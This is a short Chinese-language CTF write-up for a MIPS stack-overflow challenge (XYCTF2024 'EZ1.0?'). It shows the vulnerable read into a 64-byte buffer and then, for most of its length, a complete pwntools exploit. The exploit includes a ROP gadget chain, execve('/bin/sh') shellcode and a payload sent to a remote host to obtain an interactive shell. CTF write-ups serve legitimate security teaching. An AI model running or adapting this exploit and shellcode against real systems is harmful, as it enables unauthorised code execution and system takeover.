mips pwn例题
- 这里以XYCTF2024 EZ1.0? 为例题
- 题目分析
int vuln()
{
char v1[64]; // [sp+18h] [+18h] BYREF
read(0, v1, 256);
return 0;
}
无法泄露栈地址,因此要找适当的gadget来把sp的值给某个寄存器,然后跳转到栈上相应位置执行shellcode
- 剩下的找gadget找完直接rop+shellcode就打完了
- exp
from pwn import *
from pwnlib.util.packing import p32
context(arch='mips',endian='little',log_level='debug')
# p = process(["qemu-mipsel","-L","/usr/mipsel-linux-gnu/","./mips"])
# p=gdb.debug("./mips",'b *0x400860')
p=remote('10.131.223.200',57935)
def dbg():
gdb.attach(p,'b *0x400860')
# dbg()
'''
0x00427968 | addiu $a2,$sp,0x68+var_10 | jalr $fp
.text:00400740 lw $ra, 0x1C+var_s10($sp) 0x2c
.text:00400744 lw $s3, 0x1C+var_sC($sp)
.text:00400748 lw $s2, 0x1C+var_s8($sp)
.text:0040074C lw $s1, 0x1C+var_s4($sp) 0x20
.text:00400750 lw $s0, 0x1C+var_s0($sp)
.text:00400754 jr $ra
.text:00400758 addiu $sp, 0x30
这里很怪不知道为什么发现addiu $sp, 0x30也执行了
0x0040B2A0 | addiu $a2,$sp,0x44+var_C 0x38 | jalr $s1
0x0041FBF4 | move $t9,$a2 | jr $a2
'''
shellcode='''
slti $a2, $zero, -1
li $t7, 0x69622f2f
sw $t7, -12($sp)
li $t6, 0x68732f6e
sw $t6, -8($sp)
sw $zero, -4($sp)
la $a0, -12($sp)
slti $a1, $zero, -1
li $v0, 4011
syscall 0x40404
'''
#从sp+0x18开始读
payload=b'a'*0x44+p32(0x00400740) #$ra 第一个
payload=payload.ljust(0x68,b'a')+p32(0x0041FBF4) #s1
payload+=b'a'*0x8+p32(0x0040B2A0) #$ra 第二个
payload=payload.ljust(0xb0,b'a')+asm(shellcode)
payload=payload.ljust(0x100,b'a')
p.send(payload)
p.interactive()